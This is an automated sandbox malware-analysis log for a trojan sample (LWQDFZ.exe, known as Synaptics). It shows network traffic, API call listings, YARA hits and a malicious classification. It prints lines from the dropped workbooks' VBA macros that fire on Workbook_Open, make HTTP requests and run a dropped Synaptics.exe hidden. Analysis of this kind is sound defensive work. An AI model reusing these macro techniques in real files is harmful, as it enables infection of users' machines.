                              Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49833 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49834 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49839 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49840 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49847 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49848 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49849 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49856 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49859 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49866 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49867 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49870 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49872 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49879 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49878 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49884 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49883 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49890 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49889 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49898 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49899 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49907 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49910 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49911 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49913 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49916 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49918 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49931 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49928 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49930 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49929 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49935 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49934 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49936 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49937 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49944 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49945 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49949 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49952 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49956 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49957 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49959 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49966 version: TLS 1.2
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_003F7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_003F7099
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_003F7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_003F7294
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006C7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,9_2_006C7294
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_003E4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,2_2_003E4342
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_0040F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0040F5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006DF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,9_2_006DF5D0

                              System Summary

                              Source: c2jUHMi5.xlsm.3.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: c2jUHMi5.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: c2jUHMi5.xlsm.3.dr OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: c2jUHMi5.xlsm.3.dr OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: c2jUHMi5.xlsm.3.dr OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: c2jUHMi5.xlsm.3.dr OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: c2jUHMi5.xlsm.3.dr OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: c2jUHMi5.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: c2jUHMi5.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: ONBQCLYSPU.xlsm.3.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: ONBQCLYSPU.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: ONBQCLYSPU.xlsm.3.dr OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: ONBQCLYSPU.xlsm.3.dr OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: ONBQCLYSPU.xlsm.3.dr OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: ONBQCLYSPU.xlsm.3.dr OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: ONBQCLYSPU.xlsm.3.dr OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: ONBQCLYSPU.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: ONBQCLYSPU.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: c2jUHMi5.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: ONBQCLYSPU.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: c2jUHMi5.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: ONBQCLYSPU.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: c2jUHMi5.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: ONBQCLYSPU.xlsm.3.dr Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                              Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                              Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_003A29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_003A29C2
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_004102AA NtdllDialogWndProc_W,2_2_004102AA
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_0040E769 NtdllDialogWndProc_W,CallWindowProcW,2_2_0040E769
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_0040EA4E NtdllDialogWndProc_W,2_2_0040EA4E
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_0040EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_0040EAA6
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_003BAC99 NtdllDialogWndProc_W,2_2_003BAC99
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_0040ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_0040ECBC
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_003BAD5C NtdllDialogWndProc_W,74BFC8D0,NtdllDialogWndProc_W,2_2_003BAD5C
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_003BAFB4 GetParent,NtdllDialogWndProc_W,2_2_003BAFB4
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_0040EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_0040EFA8
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_0040F0A1 SendMessageW,NtdllDialogWndProc_W,2_2_0040F0A1
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_0040F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_0040F122
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_0040F37C NtdllDialogWndProc_W,2_2_0040F37C
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_0040F3DA NtdllDialogWndProc_W,2_2_0040F3DA
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_0040F3AB NtdllDialogWndProc_W,2_2_0040F3AB
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_0040F45A ClientToScreen,NtdllDialogWndProc_W,2_2_0040F45A
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_0040F425 NtdllDialogWndProc_W,2_2_0040F425
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_0040F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0040F5D0
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_0040F594 GetWindowLongW,NtdllDialogWndProc_W,2_2_0040F594
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_003BB7F2 NtdllDialogWndProc_W,2_2_003BB7F2
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_003BB845 NtdllDialogWndProc_W,2_2_003BB845
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_0040FE80 NtdllDialogWndProc_W,2_2_0040FE80
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_0040FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,2_2_0040FF04
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_0040FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,2_2_0040FF91
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006729C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,9_2_006729C2
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006E02AA NtdllDialogWndProc_W,9_2_006E02AA
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006DE769 NtdllDialogWndProc_W,CallWindowProcW,9_2_006DE769
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006DEA4E NtdllDialogWndProc_W,9_2_006DEA4E
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006DEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,9_2_006DEAA6
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006DECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,9_2_006DECBC
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_0068AC99 NtdllDialogWndProc_W,9_2_0068AC99
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_0068AD5C NtdllDialogWndProc_W,74BFC8D0,NtdllDialogWndProc_W,9_2_0068AD5C
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006DEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,9_2_006DEFA8
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_0068AFB4 GetParent,NtdllDialogWndProc_W,9_2_0068AFB4
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006DF0A1 SendMessageW,NtdllDialogWndProc_W,9_2_006DF0A1
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006DF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,9_2_006DF122
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006DF37C NtdllDialogWndProc_W,9_2_006DF37C
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006DF3DA NtdllDialogWndProc_W,9_2_006DF3DA
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006DF3AB NtdllDialogWndProc_W,9_2_006DF3AB
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006DF45A ClientToScreen,NtdllDialogWndProc_W,9_2_006DF45A
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006DF425 NtdllDialogWndProc_W,9_2_006DF425
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006DF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,9_2_006DF5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006DF594 GetWindowLongW,NtdllDialogWndProc_W,9_2_006DF594
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_0068B7F2 NtdllDialogWndProc_W,9_2_0068B7F2
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_0068B845 NtdllDialogWndProc_W,9_2_0068B845
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006DFE80 NtdllDialogWndProc_W,9_2_006DFE80
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006DFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,9_2_006DFF04
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006DFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,9_2_006DFF91
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_003E702F: CreateFileW,DeviceIoControl,CloseHandle,2_2_003E702F
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_003DB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74285590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,2_2_003DB9F1
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_003E82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_003E82D0
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006B82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,9_2_006B82D0
Source: c2jUHMi5.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_Open()
Source: c2jUHMi5.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
Source: ONBQCLYSPU.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_Open()
Source: ONBQCLYSPU.xlsm.3.dr OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: String function: 0068F885 appears 68 times
Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: String function: 00697750 appears 42 times
Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: String function: 003BF885 appears 68 times
Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: String function: 003C7750 appears 42 times
Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12448
Source: LWQDFZ.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Source: LWQDFZ.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: Synaptics.exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Source: Synaptics.exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCXFBD9.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: ~$cache1.3.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: LWQDFZ.exe, 00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs LWQDFZ.exe
Source: LWQDFZ.exe, 00000000.00000003.1398521267.00000000005F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameV vs LWQDFZ.exe
Source: LWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameb! vs LWQDFZ.exe
Source: LWQDFZ.exe, 00000000.00000000.1390466134.00000000004A5000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameb! vs LWQDFZ.exe
Source: LWQDFZ.exe, 00000000.00000003.1398521267.00000000005EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameb! vs LWQDFZ.exe
Source: LWQDFZ.exe, 00000000.00000003.1398521267.0000000000608000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFileName"\Z vs LWQDFZ.exe
Source: LWQDFZ.exe, 00000000.00000003.1398521267.0000000000608000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs LWQDFZ.exe
Source: LWQDFZ.exe Binary or memory string: OriginalFileName vs LWQDFZ.exe
Source: LWQDFZ.exe Binary or memory string: OriginalFilenameb! vs LWQDFZ.exe
Source: LWQDFZ.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@22/80@11/4
Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_003ED712 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_003DB8B0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_003DBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006AB8B0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe Code function: 9_2_006ABEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_003EEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_003E6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_003EEFCD CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Code function: 2_2_003A31F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Users\user\Desktop\LWQDFZ.exe File created: C:\Users\user\Desktop\._cache_LWQDFZ.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7464
Source: C:\ProgramData\Synaptics\Synaptics.exe Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe File created: C:\Users\user\AppData\Local\Temp\MHDFGY.vbs
Source: Yara match File source: LWQDFZ.exe, type: SAMPLE
Source: Yara match File source: 0.0.LWQDFZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\Synaptics\RCXFBD9.tmp, type: DROPPED
Source: Yara match File source: C:\Users\user\Documents\AIXACVYBSB\~$cache1, type: DROPPED
Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs
Source: C:\Users\user\Desktop\LWQDFZ.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Synaptics\Synaptics.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
